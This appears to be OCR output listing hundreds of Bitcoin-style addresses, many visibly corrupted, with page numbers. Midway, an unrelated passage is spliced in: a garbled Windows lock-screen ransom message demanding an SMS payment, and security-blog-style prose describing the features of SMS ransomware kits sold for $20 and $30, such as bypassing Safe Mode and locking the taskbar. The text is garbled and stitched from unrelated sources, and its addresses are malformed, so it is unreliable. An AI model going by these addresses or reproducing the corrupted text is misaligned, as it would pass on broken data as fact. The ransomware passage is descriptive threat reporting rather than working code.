1F4c9mtzUcdkxPWs4Nebmhhzh6HrJaDvjx 
1F4cPwAnLcNSMtCHRSTJoDj4uWRBjNDEPQ 
1F4dAwdmaD3P41Fo77y7YTyLcQGvAVxMMf 
1F4Dk7jFocBimU2D3QvkqepnQebSc9vTs4 
1LF4FSvQRRYsbVfPsto7d4ictLZuFLqB7i8 
LF4hFMZyGxarajCFQPvVTN25ty7TyWDsGZP 
1F4iBPSZBWH4Jpjczt)xbTwCuB7kwL1wLZ 
1F4inMdEhRbYcBvDsRGseaSFP2q5mBzaE9 
1F4jusdvi93HySPpiU5vyBWDGfYx2W9ycw 
1F4JxTN3AG55DBXmebTwPvf5qe7VQidehU 
1LF4m9ZnC1UQQWINJYJqJyTEtqHCGjf7rnk 
1F4mc7EKKKN7X24j3L16rFEkrsp44rqd2a 
1F4Rb7qoWFVbSuGtKtgQkUWin99ticBoF3 
1F4VDvafJuBZqdmzyagMhhZSoqyYLJSfWmb 
1LF4xFSgV1dfByF6rHQuT qoaYvjJnBAj1MiU 
1F4xod9SkjwG6HgqevhxXh8Nv5B8ZfHY8u7T 
1F4Y8qeHDEPEHdL8n1r7UYzjuaWkcEAW4q 
1F4yn3gLAGDXfg5mS1w40oUmN9HhRXHrHgN 
1F52H6A2kK4FiIXHQSGE5SXEVKHZHyv4MXww 
1F52Y1VPkstW67dJGiyJgBYregJEEaZX7i 
1F5abALvYRySD53669UhEYYpM 1joUjGfmu 
LF5ahEMYLd4Xyan8S61DKWmPzXwMNxXeJab 
25554 


1LF5BkEzrxCY2kqDmmVhjyagLh6eVB78SUr 
1F5k6CMasM8rBr6nQ39XpT2iBFrHhVAA2c 
LF5Ln1HidFSt3cudLhXQA659dCveo8u8YA 
LF5NoEnnLixRRL9ODP3YkrLuiGH3ikxKcdX 
1F5Q6ZUUSKgNoxtCLJU4hDUG6SiINaAk2K4 
1F5tpCmvn3KeLT xX9ots93WvcezdJW9K8RN 
1F5USwafW7bbgzPU7xcnaV7FJztBgGLzt7 
1F5Waqsjb7ZujpPCHJGVqRC3LrQdmrY4wc6 
LF5YcKGiT5i2wvKNwdxDWbbgzyYzz2Hf36h 
1LF6gARbydWPBxQvob5TbuV23w6zZCgadk4 
LF6UK7wx1SckGu5fsTwv7RDKyiVh5fmCE7 
1F6wo56tjoQrhgH2mgfkayyvYFgLKrAxz9 
1F6xgfHsoYyXFQr1VPsc3DEzzgWfArve78 
1F737YpGW7DCX3M1FMYSVWzPonLQ5gdbUX 
1F73uzhX6y4GJMbNKpPMQJisegzcvRL37t 
1LF752TT5EIEGVHBzZH4i5yz7aNkFm3gZJL9 
1F77ccDep6vHnmyYoHhhZuoiYdruueqNaQt 
1F7a6dhxxvQqEmFQRPL1CndudouJBEKYE1 
1F7bzmn3zb5cfFcrCc7 9njumgH4k3KNQqT 
1F7Di7ebyCZXkKNhfK2TB9dYy3wUTWrNTc9 
1F 7dW6ApAUBU03h19cCsdt4XgPp7iSoc92 
1F7E2SrCjokSu4RAvvn9slEEz9zxjGECWy 
1F7gc7dk3YigZ5RPciu3KEJf4kEytJAQ5a 
1LF7hihDxi2ypXLixyXW9YEDwSeuC1sK3rF 
1F7HYMPsFbucQLPCuFaVPZcJjTGZSNutkS 
1LF7jdFrr4mXC5PgcKzZUYsoVzKp9KWDd9r) 
1F7KDSdqMWSueaNnFNU2mRhhryUqfuC4jK 
1F7LaTNJKM6xgFWoRJ56RFaty]pRvsgoGv 
1F709EjFpFrxXEkvmQAbXeLHE6hrMGKahKy 
1LF7qZHpPZzwqEQWkDxxkmooQBsw/7xoyRuHy 
1LF7RM9dBpJKTd46ZyvSuLL8KS6AFzbbr1R 
1F7UYLH5HDK1C7g6Ut9cNJ7ZEsPnuH532e 
1F85SHMEvCrADSVnE843ANoeUWWSNKH7Sm 
1F8bsTorBTloopX4879N6dG5N3sLM1r3wZ] 
1F8CFfJndbB2nWN4fyXVmVLE546vZ7063P 


25555 


1F8cU77M6wuksmEC6px2vE9FDeoKwQNx5C 
1LF8d5qb1NgWNnpxfuADj8PuEbqJwsMwgjJ 
1F8i9aairTUarU9HwgK4YTkuXEz42VbuWa 
1F8J1LFSnqgRkC4HYuH2ezFtNcgchesKnwnv 
1F8kA2ysYoAdDDEo8pvTrtACqme6CFDtp5 
LF8KtNpU6HvJL5cQDpUHQTvkbR9PCuPNGA 
1LF8Rpef2DPeSy3m7GQJkixjcVPXheRiIWVm 
1F8Seu9nFgCX9mDdZqncHbQBRgvh9knNHh 
1F8uK16DmSDx2d8CG4VspEwSrv6VCkGNyp 
1F8Xr5XkRYBfCXaTdmHq 7uWJBv2PP2duNv 
LF8yyKmcdxcVQA9jKLImMirhriQDxyP5Sg 
1F8z5Sk1INeMjLXpDQw50X46GFuln45qh7w 
1F913DExgotEygi4fV2ZbVLc8rSPiIXM7Ng 
1F91xVS2cZ5QgAioVRjJCBQEYwq43rnCKnH 
1F97rCXtxTVE67DcxSNLPxiAR6uzYEj38U 
LFObfKxvEjy 7NCQ4RVSZh92vvC8cbZRdxp 
1FOBSt82UM8e89AebrwicleCMPCoGGEJxM 
1LFODFF26kKEB30sohqQAL4SYxXxXmDdVufvu8 
LFOEPTK9kqQhu3pb3jfFSWdT6n6k7schoA 
1LF9nnK1cpG6i9C96RSMx76GTP6CwzXy7AT 
LF9QUVTutdN2qw7me9RXy3Ti4D)XFfk6eS 
1LF9Qyn6w5pU7RkCvQD2C86GUHITaQwLGJr 
LFOSAR6GAFA2bf7 X9zdUyUI53pvcueA4Pus 
1LF9SpRvjJ8q6Q4bLyoWKPeZZjnE8F 7ie92V 
1FOW8EmdJsQ67FygDAFxcKtefQqYCbyivN 
1F9xRad8GZELgPw]xwHguhYg/77aAiHSz8r 
LFOYK3YHSQCQsrRGzxGQ9pé6tfrTupiewWze 
1LF9ZM6yyh4N3qwSHjsXRPibvbbSnMLYGXz 
LFALUH2w7SYb35kzzbyynAeUoHA3VGp9cG 
LFA23PJtXUW2xLUvJkzQBTjYkFtTzlyx2w 
1Fa39WLCoF4E4UnSFonJp78Kfg5kDSgpDG 
LFA4FNjfAqvSmCsouUGQ6mLZ29YBgCcrP2 
1FA7jobDfQMbGuCi9Wey2xWL6Ure5kcJbyR 
LFAQUCYSUAAo8iyZakKS15qjhMifTnSjxKc 
1LFAC2y8zWaEq2kHeb2TsC75AdwrEuK4dLE 
25556 


LFACTWmjUvPNvH81J2u6zYcx8sQDuKjH61 
LFAdH6f4Rhe5Q8q4qgZXUBWE6EMVMjZgzZNkjJb 
1FaeglayXmM587KMpshbtR2BfQjM2HzZmu5 
1Fafr9D6zZQdNJB3mswRWpGjyR6LbDtPtz 
1FAG62 XJvjiToTWmWFuMExcrb5EhSkpFy2 
LFAGtQfz1SPMPqCTIczWD74iH6wWALtFcgVZ 
1FagV8bgccmDal Topwly8n3kL9OZgJEDxTY 
1FaHixPZgFPGeUXx4XS2f4mMzjMsEhqoGk 
1FAjDjeJage7ZhnN5pZSNPrxBk7eQhjeAW 
1FaKcGAxYxaNfTSs6yoNsoxgiiS6q7uy9K 
1LFAkoyWvoEwaTm1dR3Csf169F8J5WxJTmc 
1LFALSMgJCNshswX5P4v3igGeTVUmYsB5s2 
1LFALW5J6OSNZcSinBQC9S2bTQTW2cDiIMH75 
1FAmp5pb1p3d75tciAtnlulu24FdiNrxbr 
1FannZSVL2X4cW3KHRdiUx5vsuaqwKkQ32 
1FapGzBS1dNUW3QHNO9OKLEIEQjcSBGkcmjD 
1FaUcP9SsCZKODEYDU9wDbuzo3eZCH6vyp6 
1FauhgMBswcoJjned4iyoh5EouB9mVMgkpj 
LFAV19tZFHcBxa3Yeqshu874xCU8NTW4iZ 
LFAxpiYJbzY35LxYJejqGcesWSRpgD4SaY 


LFAyt68Y9pg814VMk8ZxnoBNk6KwG7wXMW 


1LFb3FfLrTf9IDONpbtXUCeVRjcbykxUNXM 
LFBCqcN1VFFi4ja7FwWDefMrogjAVXrayF 
1FbCtDBCkyQuEESdmMHNF5CrwQkKxS23vAFf 
1FBEBshoMSDjatFEZEFnK7YByulh9rEcFp 


LFbEPivHhmzGuEClyUmMHH12Zt1VuSHMNN 


LFBf8EZYy78uMtfz9SPCAJnA3mvF92PzKp 
1FbFzeiSc6ZhBXcCUV8HFLL65ygA95w2QpL 
1Fbin474DfUGuU6cobKFDGu8X1qHhath8FU 
1Fbj/KMbMErqbdcGRdAB2nBG24XzZN8TFfvB 
LFBJrw7bhALfofgfFzT TCT2aHGYyJHunQV 
LFBNT TaYfmzRg5bXZxDz79Ppk1GgHRAVgw 
1FboRKmrReNx9C2ECwSWEt3kGinZxSE1FQ 
1LFBPtTk2uaGyfe5CNCQSiX71UuZuisyBqQ 
1LFBQD9ekJMZiYr6k9GUyuKcr1VonGmAuS2 


25557 


LFBQVbACsyLQmA3BgLnSbez9WBUkK46GY9N 
1FBSr4S2MYaNFih8AzjJEKywW5DEVrfq32 
1FBxjXncarxMSzKXzbHodGPK7Xa5zKJWvX 
1FbXkmM8a3RPpWciFeR82bRSLZiRSjRXta 
1FBZM53xRbyEkmUdE89xBBwjuzEFSqWwNN 
1fC3hv56wjtte4QjBEUomqloCdE5H33sA 
1FC3kBawzY7NtYPiKbBELZZPDNHOtsAiU5 
1LFc7iVmC3TioyxUv6ZWsRVnNLOG5SK98RENT 
1LFC7xuyXinzzYfyf344KNE4UXFeBjeVyja 
1Fc9hF4efMXLpM 30fJd59A8HN8ND3PD9nb 
1LFC9YDwSfD9wMJ8WaY8jJunGvFY1sbr2tRQ 
LFCBqTr3dzjnolFCd6XbX44bP8DcA3VHmk 
1FCD60yQq26J8LfmCkAEdZsuSesBBXpvUv 
LFCEKPykZQjtdJ5JVcqwQinZom9CsdaG8d 
LFCFMJRuxHhR4NiRLZNbvdWzoepj9SFg1T 
LFcFQnn8dtWbyS6ixr80ZkCdjqoNw 7Jjif8 
1FcikrJJLZrmP9qQmkBSSx3rUxzoo2bGvWw 
LFCpBjqUFcMGceEjJijsxXy3HC3C6aesbyuX 
1FCs126SaNUUw3R6DUUUIFZsSoXPTtRRvG 
LFCtkWTKhdWZV2eFqAU827DujTyoEiLTk5 
LFCtyPMTtmUQEpj5SRytsThkDasCdrSktD 
1FcU3MxEaxuNgp]HuqQoGf6é8gBmE2wbQe3 
1FCuMaTaSC7juRz8dCTm6BnZgHNC5Fy51r 
1FcuSjhjKKejb8N8Qn9NU2EKZVjRaUViEd7 
1LFcVhxfJKrSirfq4Srfw86AR8qgXVhAZLXn9 
1FCwe7NTGbH4QfvSfjuV8KHomouu7scgLR 
1FCwWmw34fatF2BBY6aHFZyFv2gYws9anh 
1LFcXsYb2vGqeqMwhjBdSqT QHaZzdtB8gAj 
1LFCy3jUEqeiGlLM9epc]jKR8BVZaUO6YLHJQ 
1LFCYsmg6pF3Mj4qb5C1)KrPADf8GpN7EeY 
1FD14yAsnQUAWAGEGS8NiFwxzstQmfNUJTF 
1FD1uBSSLXJfDwJPJnruMih7AX95prv2nN 
1FD1X8ZMJhBAAaHaS7SK5hXeNeysUaH2kX 
1Fd7JaAN3XyQr2f3Q8CjJSINq4n22NA8Kct 
1FDbnmHaLhUTul1FsoAJ7kXyquCysHgP56g 
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1FDdLDA1sBiFf4zstZHvPCC8wA9QhzDq3u 
1LFdEJDWc7ZU95bQm85b6iYq7YwnXrgSGmw 
1LFDEULQF5Wvs9angfghK9ZFhBnjNkDraYw 
LFDFPNmhMAHDtzUsewKqCa9ixiWD2QLadj 
1FdgdJVcCRW4MYt8KgpbUCzJWaRPtBogQz 
1FdHx64CX7xCVLVm455CScSDBdiL1667hH 
1FdiDtSCzVSDtXHDDKwGZDicB3WRj4TMF7 
1FdKlyiDsAGhvva224FDp82Q4mMTvmzqlixX 
1FDmvT4b2XYozBV6STfWjk]XgCSb9DewwR 
1FDMx2yENDFrxj7y9hHgG4oLRHE2AYkbjQ 
1FDo8froiuenUkAuBSLyRBnA9uVc6Z8EsU 
1FdqqfoFZBf7 QMgUPrW8BpCSyVNZGKNRwX 
1LFdRjuz8AUuZ9XHYhwCvrz1lw7iYhoU2GGQ 
1FdSohKAum1s]c4UTGvVQ1wufEUfw2Uzqm 
1FdSotSwBtHtVuLbKUmV6Ev4qcf]lgw61M 
1FdVBvrce911nyizqdagZJCbKwBJDD1a5C 
LFdWKDQg6Zqh4s6Zc89hyADRBAeNRUWiAz 
LFdwTj90hXUR94249WNUVqUe3JhWozs69L 
1LFDXJHfeLYK7ENvTbdaxy8889Dwmfp8ECr 
LFDYXwmvi5qMiEpVjg9yY1DX3xyvRD9X8h 
1FdZRH86xHARfLGFobipGWxUDNeWTBtFXq 
1FDzSmsPAm4oJ8RR2mTDfEqgab5K6CSmUqd 
1Fe2AkDnMC25bf73uXDPsnVUJ1tJPmMZVvZ 
1FE32xcN5mPetyPqAcJSzSjgVeL84jEkKWP 
1Fe3z85keyBvtX7eTyfY89NXGPYj791x2n 
LFE4FbQ3EjHP11xHnE6hwéx9AtrhptwZz4 
1Fe5bXZdDyfQwjJsfqGNTZn5b9SLd7etatT 
1Fe50VohnRLZy549haqpFvp4PKcbxdUqZE 
1Fe88hdBxTKVMWAQtLyV7TcV5BSGSXtXL8 
1FEAxLzGzv3ZgKJURg2JUUnF7vD7Ne38NU 
1LFeAYvU6Sqjiaddsof—EzRUZxHZkjBEMsdL 
LFEC8m6hJMimNvAtSeiMvZGbPXeMx4chXE 
1Fecql1TVMPMjWQTbvYdCoYeTquR4DisbF5 
1FeCxNZbCSHmJWHR/7TbfZYtTP2AVT pFrwf 
1FEd18WaFTUjau6da9pyZC3MduBS3tGZmb 
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1LFEfj1zawPEAkAgfe8wHLCqDfQjzKQVQo6 
1FeFW5p2BDfY1SJGPX7gX9a2Cve2TX28s0 
1FegaJNgUtMYCzvy2eH49RpxxkcmZ8hjmE 
1Feh7PhrCGBYt3SoEXnYVh]J7rcUV4gekPd 
1LFEkasjNxzvBgVcNvtkKpVvUah6JTxpszTXx 
1FeMSXZ7YeZn36Qymik3w1MEMgDn9kKuAdz 
1LFENecf52ndqoYmDH5DtZZ9ZVeRCKSQDYa 
LFENiZeXnzWN6P3MZQmuZgagE8XxZUXisVL 
1FePCWpHnn9kHeoje5zzZBh4GfCiukKhfAt 
1FePqweRNo84WhsQRJ6PFqu8tjExhezqUt 
LFEpTYE8yw71RCJpwyKauZdm3EVHg1lpweq 
1FeqrSzwrNdgqb6UQxstYjr7dmfR5GKZ7W 
1FeQWKAVoRzxGt1SfixYBVUEx7eMnkSLFQ 
1lfeqxeMY9eg17 7JhHVUIgM5PCsYtuuX6xu 
1FeS1Z8pYnZvM8FzJGKURDP9vVagrEEs5M 
1FesA2tlwZktP7HjVnzmi9T 7hEckY44f3z 
LFEVQKn2SZo09yWTh839spk60SDT]vLg21h 
1FEVrDSDcrG2wc573XSSnjJGspYpAsDnsRH 
1LFEweErLBZMJPtUqLjMAqCw5BzfucWP3uZ 
1FEwgbajTv3tvvExFQQxd132d3najR1joi 
1FewYoy8jaHL8U34wiYBwYPqoGWcYb6Hwz 
1FeXvY7QRKX]xCgTRgtvnDUWy7bpQCpgP1 
1FeyxHweb2r1YG8X4Qj8rUn9hFWddEoqoD 
1LFF1LXPILB3YkuqZ4TfMKqbDd62Ym9CEhTH 
LFf51cMF25CDjRhza75kLDdg6YXUgz1Jpv 
1Ff7hoyxa6sgsur3k2n87C5bc8jRsyjJg 
LFFAP1LYq4amuoVvvjhN4QnTMRdYQaibojD 
1FfBFbL89eyfBeaXQNswQ5Ushh7eLMRZH 
LFFBHYS8n4gw72ePoSNDPUreo3sdnG53pp 
LFfCciIDtLfrp2tKiH LSZHByqw1N9VhMxyY 
1FfdahiFyAbSxcYDfRXWezFbyYAQXZ9zjQ 
1FfeBdkUSz5tGyY7QxRQY6e2s23TfNOohMZ 
LFfEEIYBA62iiID5DfnnQbGPgggLjhujDqv 
LFffl1MKGJcvNcFeb5Xx2uU7vnwVCFWap9c 
1FFg12xZ3MUrHMX6GORSRT67BZeA3x8dUE 
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1FfjZebMLXHKLP5MjB8Scmbdgieojqm2Rt 
1LFFk7M2sPLG8g7eHy9KrhXrPu9jb3MMZXY 
1FfnPS9QGBSKMNbnoV3MWHxD/7McxtiK3RijJ 
LFfpF 7ocUNghqvW)JfV8D7yeSwYMxKAGgLSi 
1LFFpvpkx6rmLydsVi2GbJnD2xnyBm5H5uT 
LFfpykjHwwTZzmoE4P4VfhJ6Yvs8qLuN9LJ 
LFFpZilM1ggthV2cH7qJnyLMQFLBduwNzB 
LFFRFXPM1eZaJHPPDkchZ92FXkTJdgfWxN 
LFFrXsMmj9GM4BhBq1SzaJpPri30t77iMA 
LFFU5VqHGZJTXUH1DFy5VN3ES3jhHbusco 
LFFVjHCQB6j8UAjQ6jKxTiP87oJfgoyFZd 
LFFVzhzDnagqMXrPq3g3aS4H5q1X84HbFsP 
LFfWMD1qYDyGU32JmVzyZhrJDJrFHy11Wu 
1LFFytXuVbfikgyjJcY5sdN4g5UqQtFt655 
1FG3m5ccSA28kksXzS1FXyXs381eC1lEFmF 
1Fg3xNyFb3KFuxRPY76n8LedtonnjJuRt5k 
1FG6Jy4SBbMzzYs9Q8vtpaYL3ySwdNBUkn 
1FGBEBWdCcF8Nvk3UNKtPDNpjwsWWZ262t 
1LFgbPFqQpSR4So3jVE6rVBmrcZT5ek8uTZ 
1FGCeK4AZBdiDMyJfzLF8Hny23LTYn7MGN 
1FGGELwFzzz3XGdjYmpV5h3KSZZpJRT1lad 
LFGgqTtRueUR3HW1nQzGzZNeQjxnjmpagtn8s 
1Fgid1RT4T3K1XwRdFe4xrV2sumQfNCght 
1fg)vVHDmkFVyta6JqJUs3XZFpBnnYvSgP 
1LFGKH6taQRZJZdrrGEJg7Nuz6kEbgyKcVA 
LFGMGQ)VjaZfV2QvMd4EFT3xznNBtBKVf4 
1FGnSh5dYJJPJS7qWQGUEHxpMTpmj6ZU6H 
LFGnvfW9Mc3vBZBekE4TXw88eDqfDfNVsm 
1FgopiRDRx4MPqi5dgnyTGe9zVYMVr1P8} 
1FgSZotRw2TeeyQZZHi7FNMdxXtJ5zMTZex 
1FGv5PbkfVtCD3SnWxFhboyHkxjAPKfDos 
1LFgxE3Ej5x77b8zkWAUxeYB8yTtE5xTeCB 
1LFgydySFpnEkQivtoS5sMyFNPe4BThgqntrh 
LFGYM2ag6gcM6WnjJY5CgYwPXCZc6j67hhG 
1LFgYzyEQaacVcxrM6EWcRmAceMyx9W3vjx 
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LFGZNJAtT60LEdec4smZi3AQTpgvgc5Ybm 
LFH3V3cE63Bg5Vp4wUXmLjJua5qjsQ4W1He 
1FH4wbB6DUzZXTGRWgSAbinwueyultkx1Wi 
LFHfWURRgPhbRqEEmzJCFEkszbWRCNpBCg 
1Fhgwk1KH57F5NXAskKSdyeZ3Ubphz2 Too 
1LFHhghziNzrfeVbZsoQGZnM8R9OCUBLX3i2 
1FhipbUAwmDVFSBJHMAEKMFm93UY4JPbspk 
1LFHJGpNQPoEHy3Rm4cjJn3KspVGv59x6erQ 
1LFhK1fg69ktr¥sdevkMgAcowWgLSzk1CyT 
LFHnHHegVsqLUJKZ9H70KE67b6GXGmEbHX 
1Fhoe6hCyHNmimS5TvU8sqmé6poYL7Aasiw 
LFHt8Crc2NaYPteQH63xMQUNUNVcNpRUxZ 
LFhTc9uiKBnUDLrrVM 7vatF4iyxkEGwo/7f 
LFHtVGDjLJYS7ycM2NEqwjqkfwLdemgibR 
LFhHVUQ9q7K8tx4ii8UBBrlgbLFr7t8hiGK 
1LFhXfnvyLbkLt4BDFygZCeb98sA2QjCe7u 
LFHxyAQJabTDc5wLCvvcnxgib4vV7FDkws 
LFhHYQHr4a6wwkK3A5hRWdkVUnLkmYG321YW 
LFIILJ8tpfiCV7nPjdjmp816CyZ8YANYQK 
LFiILMxfLJK6oMK7dS8eKbUJcmoQZzpprzM 
LFi2Lqq5RiFMuJzz4QYrwL6aZoN4pUgpxXw 
1LFicdEhaYNdmJD9Zfrv22MZLmMAJw270NLM 
1FidJubdaVcus4vXNCgYNBhzYh5pXUnFTS 
1Fie8arMwwMXfBTM27Cq4V2X6xTKA7PLWE 
LFIfQiIEQvsGgAqU99YbqyHgq44DzZN3nXFSFm 
1fijHv8yw4T8acRCpJCfvCUCm7tt7nsmc 
1FINLD8BHt3jZu3H826dDvXrPEq3p51dLX 
1FirGZfKxbZp475PGfTP2HzZ33AtVttkESb 
LFITMZh9df6fByWekoNnSqfa4gMefLyuRD 
1LFiwtCiSe9MfLB6qkKZn7qhdiuN76n7ePT 
LFIXXQ9OLhHKSyJmMX4Qzfksc8B5NeHUXjCq 
1LFIZXBEg5FHGXBmsATjMCuJ2zZvDb6pVjv 
LFJ5ka9LhzYXtnWxR2Eg5Vz3J68dqRVFnf 
1FJ5Vyvavxb4Lr4xP11wDSUdsBoSyWgc34 
1FJ6PSaHAcXMjhAiqWCgNN6A7PuC7VrHAW 
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Fle Edt Vew 4 Team Windows Heb 


oR Tes o8 aunlbdo 


OC Windows sa6noknposBana! 


"Your copy of Windows has been blocked! You’re using an unlicensed version of it! In order to 
continue using it, you must receive the unlock key. All you have to do is follow these steps: 
You must send a SMS message. You will receive an activation code once you do so. Enter the 
code and unlock your copy of Windows." 


Anticipating the potential for monetization, cybercriminals are investing more time and 
resources into coming up with new features for their SMS based ransomware releases. Two 
of the very latest releases indicate their motivation and long-term ambitions into this newly 
emerged micro-payment ransomware channel. 


What’s new, is the social engineering element, the self-replication potential through re- 
movable media, and the contingency planning through the use of multiple SMS numbers in 
case one of the numbers gets shut down. Let’s go through some of the features of two newly 
released SMS ransomware variants offered for $20, and $30 respectively. 


What’s worth emphasizing on in respect to the first release, is that it’s Windows 7 com- 
patible, and is the first SMS ransomware that allows scheduled lock down after infection 
- presumably, the author included this feature in order to make it harder for the victim 
to recognize how he got infected at the first place - as well as multiple SMS numbers for 
contingency planning. 


Key features include: 
- Clean interace 
- Bypasses Safe Mode 
- Locks down the taskbar or any combination of keys that could allow a user to close the 
application 
- The error message can be customized 
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1FjaDRNdp3BZAMHTF3Ic5tbiGCtpYRNZqm 
1FJbKdwtcfZMQualDxB2scVmMbuo3YxipX 
1FJDQb6s2RXvoDfbi2fk7HV8xJ73V4kKMLk 
1FjehHAealdkK4s4NjGPUxiHBbcWxDnqGc7 
1FJexguapB7B46g14AMsfSfMTz2DZwNSot 
1LFJF4Y3DQxo8uyKK2ErfZj91Lgf4jmRVLx 
1FjjGaQbxbsEU9U7WBc4dHUAErVeQxKM2b 
1FJLYejnzuX6rZfBPH3ZvAX8WuECxXgS2b 
1FJMDKbNGS5igJuUPHfSdxowWaadE5wR5Y4G 
LFJnZJXfUR4S7j3 7THHHLqCoq47yWen54j 
1LFJPLPVTMtiat7 WgA9Bkqk13N9vofuWEeF 
1LFJpENvuGz5QdzgXTY5mxXs5ZupgXTmtZ1t 
1FJRfgCmd37Pxfkt4gomDqCWvjJEXBlyyk6 
LFjtCQVLLUPUUZVWDBCXrkPzVSMmAHAr9ui 
LFJUFYFCdAo89QwK5FScQhjp88TncMaC13 
1LFJjWSNFCfUEhezYfk6ysfkKmQcrAujVpMcG 
LFJWTING2XNQyJQb9Mcf9rmudfetuDMRYIZ 
1FjX3dZQFSTLREG3gGxQ5kNJjegvnMFDSm 
1LFjyeE97F5QwvDVy2w5QJgF2qY ToUbPBDe 
1LFJZH30BEVrSknUpNb4qDmxRi6TMckbU5h 
1LFK16F2EscdgAnB7bDFUP4NTVVLY3E41cV 
LFKAQHfyU2nxuuXUigiKGkVSHTsgsdkeMe 
1FKaT9a9QudvSoG2Dw3J6d6SvVBoBuYWOW 
1FkcMBFrgkerNsxS3EGCyRL6RziIMxKU2Zb 
1lfkey8rWjxhxgSakscEfSHrENqz595nGq 
1LFkKG7gMNoRvbAfYgcGNY8krbMNbkwwAbk9 
LFkgJLZNFJjAMSWRmpQrkKyEfeHrdxXfVqya 
1LFkhqYEUBbsjha3XQRAuLj9exXT1jAVFu5 
1LFkjTgPNcx2ucHaEa846HSd9sMaKMD1GUh 
1FKki6uRtlfgEFWHxsTTiYfn4EsowSYWrN 
1LFkkPadmUfnH1vZ4vn9URALiXBC7hjEbLw 
1FKLd95BKZKA3WaJZg7P48N2S6VRQN1yRC 
LFKnH2yTHxJaQr2S96vm945fkGgoR6C97v 
1Fkox6deTdK6rWSnn8uqmoMSavCkYwDkoT 
LFkKPU4RMPjfGe9AgLLqwgc)X78u2ftzaQr 
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1FkQX44apwjqyXBaZHx9KKNNLoetybjUQS 
LFkrY6NSXxsQFueh]mJjwwY9f7wnepYD5Y 
1FKs3EDh6emhZpwGcj4ASSb3ccURHNYoQT 
1FkSu508QtFM4KTDgfbfcGLYWokdcruN2B 
LFkKUPD3inaPM2yK3mFGT5FBxdeljJsqxW1 
LFKww6FPtGpbpFUUWTY 7mjJhiTqobs6mKwnu 
1FkxKoatfVSp8XeLty8fDc98hD6sqKb1LT 
1FKyL3hZogdxWXDDqX6gSkjS2VzmV1qvgs 
1Fkzs7dn53h3zsp83XjRLL1bFqYvSsmbzV 
1FL3qBjBMuTkyrHvBtjcieiPo>Goqxx6gsz 
1LFL7MbGS7GzsoW3KiwPzFV990xCLjXn1gn 
1LFLcrJnnhT1tT3hFcpyP7RfAwkiBuUkdVP 
LFLdKhk7Q4LnhD3cHXcmMoXTK8ugcUU4pN 
LFLENgwhkYULjvhhp8j1kuRDVDEBGWmoGG 
LFLEtq4bm6yMgwdT61hfMjWuQ6TBCGFQVE 
1FLorbp3rLnvjJeZUuCrQ4NjxDdHz7i1lK28 
1FLqevTMa92imndyGysQ77Qo8HNuB7GXH3 
1FLregB9rxqmpsmgqhGw3ti8cMk57ZaxQse 
1LFLtN6OBDfm5fBPzf4rN8MDjJtqoWvZZbUtp 
LFLUcg2mLX5JEe5uePUJfrUPwzTrBceUae 
1LFLuFzfqdiGzZJammYcKAXxoAromp6m23yT 
1FLUKGQn68JzSS3tTsB38we7vaESsRmx3m 
1FM3J557ZMUNNTCycraUdq4SeLSjw7g4M3 
1Fm9KfDxfQKo7n7t2ePBjzijoPHaG2DBeH 
1FmAZn97QRneydNCGuoSiMeuZWRZjMMEXZ 
LFMBqkio8ryWjtDhK1xvTGNHp4YZq4fcm7 
1Fmd2mDV1JumpoScS7nGSM3amfrsbWX4pT 
1FMe2Dfc6kKakjiSTfbo2HP20cSPxeACsY 
LFMfe2isE2JvgmsA4zcVNUFUHdEwLnfNCr 
1FmFpiawD7pWoEiWpkWFtt7Qb6xMwoidiF 
LFMgH3gcRgpKNdzB8skMWvN5sbh9M7p4jJz 
1LFMGKKEBjuJCBgdAdmjj3FmkxX4huQ95LFS 
LFmGSbquu8go43w1pJt544ik63ZoTq2Ujm 
LFmGtFqFQlyDrBiJu2HFXDUINrD52xhsAx 
LFMGTqGz8VxyaE5t4FGnwuumLh7GTYxqcN 
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LFMLHphY6rmoscqhF30RBYMpDyGAK3RmLZ 
LFMMbwkkPVtUeiHw7fdryBnTbBr7dPKULr 
1FmMCvyPigWDsBfG8pGUNvkVDe4nN7z4MV 
1FmMomtPURNpH]brjaaCA2eBkzY80Q6zRx 
LFMMYwiH6UTSxKatxqsaT5BysHwVfHWhxy 
LFmMNjRZGQXwKwDHoQsrBdSipnepsVVSjcL 
LFMp7QCkvFZbUNNKT 7tw4qgqA690SQwPW5 
LFMQ1JQ7JmFCMQUe58azTAQuWAq5UjnmsB 
1FMq6zZymvBD5B8Uhk600rhF679uU0QbR8v 
1FmQFtacmug9F91bu04 Tf75DejkX5LaFCf 
1FmrB1M88j7J964GMWUstg3Arh8M5Ufm1B 
LFMuAjXRTMSErFdLDJdkzf9mBVScemTDNg 
1FmUPaS2VN93HBq2xL4hH2HbuTMgGRhLRb 
LFMUzD2rHWvxbcY1RNgv7mF9kWaaCbECbx 
LFMvXcnPgQZ5H6A7amoWfuNbpnj2fA6Wev 
1FmXhLsqctmFé6tnfVNooFJ80GLJbnQF5vs 
1FMZMsR7MSFHw7E53KvwhWs1lhTfGz62rjd 
1FN3Cuf1lVhSYzZwdNYi4D309f76e3D8gkCC 
1LFN56a0iQuUPSUoVZMGBq3U5jeEqXBhMorm 
LFN6qcY4izsU12fgRIDUUW2p9EtcuRv11t 
1Fn9gr7jdxmFGNkusBhVYW9yY8MWRgDBii 
1Fn9ydSSLAJRDDEhTAuihgxYx4x9chKo2y 
1FnaM12Uhb416Mc2VKhN86KujRXcEBEj1W 
LFNApqN2QbciynxAd1cTwnLeN2qoiwx7hz 
1FnBtkqxw860QsEYtlmNyeMhJWTEFX1bvL 
LFND2VMfdm4kKt7JwMRRwtF4ayQanvjcRjo 
1FndUnnksYkyBjixXTFqw6H56jc7nZtxqiV 
1FNE7LGY7fFVGGtnovSisl1dGVNnLwSDume 
LFNEYSC5S2kP9s54iHxr3MF5cjtPismJMe 
1LFnf5Q7GpqbQJ1g7RvTL4xhNLn9FDnoxEXx 
LFNf6GXEpbtU68nLHoiTCYoZgsWgSYHpnVv 
LFNHMbiQ9kKRRzgUCWcZTMGSN6n7N8zZUCZx 
1LFnhuFdvN9KoQ943nvPRidzAc4MTvfpEUc 
1FNHVXSsToQL5VLPkrQdEXHvrDY9WggZou 
LFNJAvu3KrzZyGkELkJ4e7Nz7qJn6R97UG 
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1Fnmyh1SMC14ziA1nqX4RNrKL8roNXepUG 
LFNNNhzP16rC6dK4ZLUGULGB64UWLSULNz 
1FnpGKnsbf6A3CSgmyYGy580AISMEkK9pYEV 
LFNPKjPvho7QQakf4cTQeY5xq6t5ipngTA 
1FnrtieM2xwXMzyVmmyNG5FuCpmxCq5XNU 
1LFnRtzG7WrD1hL9g6rCCjBtRaDgDo6KxXK 
